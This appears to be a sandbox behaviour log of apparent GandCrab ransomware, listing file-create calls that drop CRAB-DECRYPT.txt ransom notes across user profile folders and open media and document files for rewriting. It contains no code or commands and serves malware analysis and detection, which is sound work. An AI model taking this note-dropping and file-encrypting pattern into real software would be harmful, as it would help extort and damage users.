Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.MiracastView_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.PrintDialog_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\INetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\INetCookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\INetHistory\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\AC\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\Fonts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\Licenses\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\8IT9H3B2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\S0DXV6ZB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\Z8MX2JKH\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.MSO\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\counters.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\8IT9H3B2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\8IT9H3B2\instrument17[1].htm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\S0DXV6ZB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\Z8MX2JKH\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\Content.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\IE\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\SmartScreenCache.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Low\SuggestedSites.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Virtualized\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Virtualized\C\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Virtualized\C\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDB.chk desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDB.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDB00006.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDBres00001.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDBres00002.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\EDBtmp.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\vedatamodel.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CrashpadMetrics-active.pma desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\Databases.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
